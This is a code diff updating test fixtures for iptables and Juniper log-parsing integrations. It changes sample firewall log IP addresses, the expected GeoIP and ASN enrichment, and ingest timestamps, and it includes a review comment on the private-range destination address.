@@ -1313,13 +1387,13 @@ "mac": "90:10:65:29:b6:2a", "ip": "192.168.110.116" }, - "message": "MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0 ", + "message": "MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:6BwNFzns3BNljtYZJCwhPO5Qoq0=", + "community_id": "1:6eLXxu4ppPpoPmb/0UoBhdMHrBQ=", "transport": "tcp" }, "observer": { @@ -1338,13 +1412,13 @@ "related": { "ip": [ "192.168.110.116", - "192.0.2.25" + "192.168.2.25" ] }, "event": { "action": "drop", - "ingested": "2021-06-15T20:04:36.725516021Z", - "original": "Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0 ", + "ingested": "2021-12-09T13:39:42.195810200Z", + "original": "Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0 ", "type": [ "denied", "connection" @@ -1383,7 +1457,7 @@ "destination": { "port": 1443, "mac": "90:10:20:76:8d:20", - "ip": "192.0.2.25" + "ip": "192.168.2.25" }, "rule": { "name": "WAN_OUT", 
@@ -1394,13 +1468,13 @@ "mac": "90:10:65:29:b6:2a", "ip": "192.168.110.116" }, - "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0 ", + "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:6BwNFzns3BNljtYZJCwhPO5Qoq0=", + "community_id": "1:6eLXxu4ppPpoPmb/0UoBhdMHrBQ=", "transport": "tcp" }, "observer": { @@ -1413,13 +1487,13 @@ "related": { "ip": [ "192.168.110.116", - "192.0.2.25" + "192.168.2.25" ] }, "event": { "action": "accept", - "ingested": "2021-06-15T20:04:36.725518668Z", - "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0 ", + "ingested": "2021-12-09T13:39:42.195816500Z", + "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0 ", "type": [ "allowed", "connection" @@ -1458,7 +1532,7 @@ "destination": { "port": 1443, "mac": "90:10:20:76:8d:20", - "ip": "192.0.2.25" + "ip": "192.168.2.25" }, "rule": { "name": "WAN_OUT", 
@@ -1469,13 +1543,13 @@ "mac": "90:10:65:29:b6:2a", "ip": "192.168.110.116" }, - "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0 ", + "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:6BwNFzns3BNljtYZJCwhPO5Qoq0=", + "community_id": "1:6eLXxu4ppPpoPmb/0UoBhdMHrBQ=", "transport": "tcp" }, "observer": { @@ -1488,13 +1562,13 @@ "related": { "ip": [ "192.168.110.116", - "192.0.2.25" + "192.168.2.25" ] }, "event": { "action": "accept", - "ingested": "2021-06-15T20:04:36.725521297Z", - "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0 ", + "ingested": "2021-12-09T13:39:42.195823800Z", + "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0 ", "type": [ "allowed", "connection" diff --git a/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log b/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log index b15c3a33a65..dafbe07d543 100644 --- a/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log +++ b/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log 
@@ -1,8 +1,8 @@ -Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=255.55.174.225 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520 -Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.0.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0 -Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0 -Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0 -Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0 +Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=81.2.69.143 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520 +Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.168.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0 +Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 
ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0
+Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0
+Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0
 May 5 20:46:45 My-Office-Gateway user.info kernel: TTL=126 ID=15317 DF PROTO=TCP SPT=59344 DPT=443 WINDOW=8212 RES=0x00 ACK PSH URGP=0
 May 5 20:46:46 My-Office-Gateway user.info kernel: TTL=126 ID=51392 DF PROTO=TCP SPT=51653 DPT=7914 WINDOW=1024 RES=0x00 ACK PSH URGP=0
 May 5 20:46:46 My-Office-Gateway user.info kernel: L=126 ID=8698 DF PROTO=TCP SPT=88 DPT=51179 WINDOW=2053 RES=0x00 ACK URGP=0
diff --git a/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log-expected.json b/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log-expected.json
index 3ea39ace522..6a87be00a00 100644
--- a/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log-expected.json
+++ b/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log-expected.json
@@ -19,9 +19,27 @@
 "ttl": 64
 },
 "destination": {
+ "geo": {
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
+ "location": {
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
+ },
+ "as": {
+ "number": 20712,
+ "organization": {
+ "name": "Andrews \u0026 Arnold Ltd"
+ }
+ },
 "port": 48689,
 "mac": "90:10:92:6e:ea:a7",
- "ip": "255.55.174.225"
+ "ip": "81.2.69.143"
 },
 "rule": {
 "name": "LAN_LOCAL",
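Review bot: The four TCP lines of the test-ubiquiti.log hunk now read `DST=192.168.2.25`, an RFC 1918 private address, so the `WAN_OUT` and `source-dest` cases no longer have a public destination at all; the old `192.0.2.25` sat in the RFC 5737 documentation range, which is presumably why no geo data resolved for it. As the expected output that follows shows, only the first event's `DST=81.2.69.143` now receives `destination.geo`/`destination.as`, so those four events lose that enrichment coverage, and any private-range handling the pipeline applies (not visible here) would now fire for them instead. If the rules' destinations are meant to stay public, a second address from the supported test subset, e.g. `DST=81.2.69.143` in place of `DST=192.168.2.25` on those four lines, keeps the original semantics. The same substitution is mirrored in the expected-output hunks below and would need regenerating along with it.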
@@ -32,13 +50,13 @@ "mac": "90:10:73:ba:d6:77", "ip": "192.168.48.137" }, - "message": "MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=255.55.174.225 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520", + "message": "MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=81.2.69.143 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:3qoibVBmc9hsnHpP4Ms5HO6ls7Q=", + "community_id": "1:X0/C+OHn+Y6LtFV5zGJkFDVT7/M=", "transport": "udp" }, "observer": { @@ -51,13 +69,13 @@ "related": { "ip": [ "192.168.48.137", - "255.55.174.225" + "81.2.69.143" ] }, "event": { "action": "accept", - "ingested": "2021-06-15T20:04:38.320846840Z", - "original": "Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=255.55.174.225 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520", + "ingested": "2021-12-09T13:39:44.256951500Z", + "original": "Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=81.2.69.143 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520", "type": [ "allowed", "connection" @@ -97,7 +115,7 @@ "destination": { "port": 443, "mac": "90:10:20:76:8d:20", - "ip": "192.0.2.25" + "ip": "192.168.2.25" }, "rule": { "name": "WAN_OUT", 
@@ -108,13 +126,13 @@ "mac": "90:10:24:67:f4:89", "ip": "192.168.134.158" }, - "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.0.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0", + "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.168.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:7bPQdYPL4yePwQJZt0I1dvVXLHc=", + "community_id": "1:BdmTg+UWl4/8/mdbYIG/bhkVfJQ=", "transport": "tcp" }, "observer": { @@ -127,13 +145,13 @@ "related": { "ip": [ "192.168.134.158", - "192.0.2.25" + "192.168.2.25" ] }, "event": { "action": "accept", - "ingested": "2021-06-15T20:04:38.320852629Z", - "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.0.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0", + "ingested": "2021-12-09T13:39:44.256960300Z", + "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.168.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0", "type": [ "allowed", "connection" @@ -174,7 +192,7 @@ "destination": { "port": 1443, "mac": "90:10:20:76:8d:20", - "ip": "192.0.2.25" + "ip": "192.168.2.25" }, "rule": { "name": "source-dest", 
@@ -185,13 +203,13 @@ "mac": "90:10:65:29:b6:2a", "ip": "192.168.110.116" }, - "message": "MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0", + "message": "MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:6BwNFzns3BNljtYZJCwhPO5Qoq0=", + "community_id": "1:6eLXxu4ppPpoPmb/0UoBhdMHrBQ=", "transport": "tcp" }, "observer": { @@ -210,13 +228,13 @@ "related": { "ip": [ "192.168.110.116", - "192.0.2.25" + "192.168.2.25" ] }, "event": { "action": "drop", - "ingested": "2021-06-15T20:04:38.320855475Z", - "original": "Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0", + "ingested": "2021-12-09T13:39:44.256966Z", + "original": "Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0", "type": [ "denied", "connection" @@ -255,7 +273,7 @@ "destination": { "port": 1443, "mac": "90:10:20:76:8d:20", - "ip": "192.0.2.25" + "ip": "192.168.2.25" }, "rule": { "name": "WAN_OUT", 
@@ -266,13 +284,13 @@ "mac": "90:10:65:29:b6:2a", "ip": "192.168.110.116" }, - "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0", + "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:6BwNFzns3BNljtYZJCwhPO5Qoq0=", + "community_id": "1:6eLXxu4ppPpoPmb/0UoBhdMHrBQ=", "transport": "tcp" }, "observer": { @@ -285,13 +303,13 @@ "related": { "ip": [ "192.168.110.116", - "192.0.2.25" + "192.168.2.25" ] }, "event": { "action": "accept", - "ingested": "2021-06-15T20:04:38.320863506Z", - "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0", + "ingested": "2021-12-09T13:39:44.256969400Z", + "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0", "type": [ "allowed", "connection" @@ -330,7 +348,7 @@ "destination": { "port": 1443, "mac": "90:10:20:76:8d:20", - "ip": "192.0.2.25" + "ip": "192.168.2.25" }, "rule": { "name": "WAN_OUT", 
@@ -341,13 +359,13 @@ "mac": "90:10:65:29:b6:2a", "ip": "192.168.110.116" }, - "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0", + "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:6BwNFzns3BNljtYZJCwhPO5Qoq0=", + "community_id": "1:6eLXxu4ppPpoPmb/0UoBhdMHrBQ=", "transport": "tcp" }, "observer": { @@ -360,13 +378,13 @@ "related": { "ip": [ "192.168.110.116", - "192.0.2.25" + "192.168.2.25" ] }, "event": { "action": "accept", - "ingested": "2021-06-15T20:04:38.320866951Z", - "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0", + "ingested": "2021-12-09T13:39:44.256973800Z", + "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0", "type": [ "allowed", "connection" @@ -411,7 +429,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-06-15T20:04:38.320869594Z", + "ingested": "2021-12-09T13:39:44.256978900Z", "original": "May 5 20:46:45 My-Office-Gateway user.info kernel: TTL=126 ID=15317 DF PROTO=TCP SPT=59344 DPT=443 WINDOW=8212 RES=0x00 ACK PSH URGP=0", "category": [ "network" 
@@ -453,7 +471,7 @@
 "version": "1.12.0"
 },
 "event": {
- "ingested": "2021-06-15T20:04:38.320872209Z",
+ "ingested": "2021-12-09T13:39:44.256983800Z",
 "original": "May 5 20:46:46 My-Office-Gateway user.info kernel: TTL=126 ID=51392 DF PROTO=TCP SPT=51653 DPT=7914 WINDOW=1024 RES=0x00 ACK PSH URGP=0",
 "category": [
 "network"
@@ -494,7 +512,7 @@
 "version": "1.12.0"
 },
 "event": {
- "ingested": "2021-06-15T20:04:38.320874900Z",
+ "ingested": "2021-12-09T13:39:44.256987700Z",
 "original": "May 5 20:46:46 My-Office-Gateway user.info kernel: L=126 ID=8698 DF PROTO=TCP SPT=88 DPT=51179 WINDOW=2053 RES=0x00 ACK URGP=0",
 "category": [
 "network"
@@ -536,7 +554,7 @@
 "version": "1.12.0"
 },
 "event": {
- "ingested": "2021-06-15T20:04:38.320883074Z",
+ "ingested": "2021-12-09T13:39:44.256992200Z",
 "original": "May 5 20:47:09 My-Office-Gateway user.info kernel: 0 TTL=126 ID=15461 DF PROTO=TCP SPT=59289 DPT=443 WINDOW=8208 RES=0x00 ACK PSH URGP=0",
 "category": [
 "network"
@@ -577,7 +595,7 @@
 "version": "1.12.0"
 },
 "event": {
- "ingested": "2021-06-15T20:04:38.320885826Z",
+ "ingested": "2021-12-09T13:39:44.256996700Z",
 "original": "May 5 20:46:56 My-Office-Gateway user.info kernel: L=126 ID=8702 DF PROTO=TCP SPT=88 DPT=51182 WINDOW=2053 RES=0x00 ACK URGP=0",
 "category": [
 "network"
@@ -620,7 +638,7 @@
 "version": "1.12.0"
 },
 "event": {
- "ingested": "2021-06-15T20:04:38.320888483Z",
+ "ingested": "2021-12-09T13:39:44.257000500Z",
 "original": "May 5 20:45:44 My-Office-Gateway user.info kernel: TL=126 ID=4622 DF PROTO=TCP SPT=389 DPT=49209 WINDOW=8192 RES=0x00 ECE ACK SYN URGP=0",
 "category": [
 "network"
diff --git a/packages/iptables/manifest.yml b/packages/iptables/manifest.yml
index 5cad44e3c23..2a29abe83af 100644
--- a/packages/iptables/manifest.yml
+++ b/packages/iptables/manifest.yml
@@ -1,6 +1,6 @@
 name: iptables
 title: Iptables Logs
-version: 0.6.0
+version: 0.6.1
 release: experimental
 description: Collect and parse logs from iptables and ip6tables with Elastic Agent.
 type: integration
diff --git a/packages/juniper/_dev/deploy/docker/sample_logs/juniper-srx.log b/packages/juniper/_dev/deploy/docker/sample_logs/juniper-srx.log
index 38c0e516592..253d25cb005 100644
--- a/packages/juniper/_dev/deploy/docker/sample_logs/juniper-srx.log
+++ b/packages/juniper/_dev/deploy/docker/sample_logs/juniper-srx.log
@@ -1,2 +1,2 @@ -<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.86 source-address="192.168.1.100" source-port="58071" destination-address="103.235.46.39" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"] -<14>1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.134 source-address="10.0.0.1" source-port="594" destination-address="10.128.0.1" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="10.0.0.1" nat-source-port="594" nat-destination-address="10.128.0.1" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="1" policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] +<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-address="192.168.1.100" source-port="58071" destination-address="67.43.156.13" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"] +<14>1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="10.0.0.1" source-port="594" destination-address="10.128.0.1" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="10.0.0.1" nat-source-port="594" nat-destination-address="10.128.0.1" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="1" 
policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"]
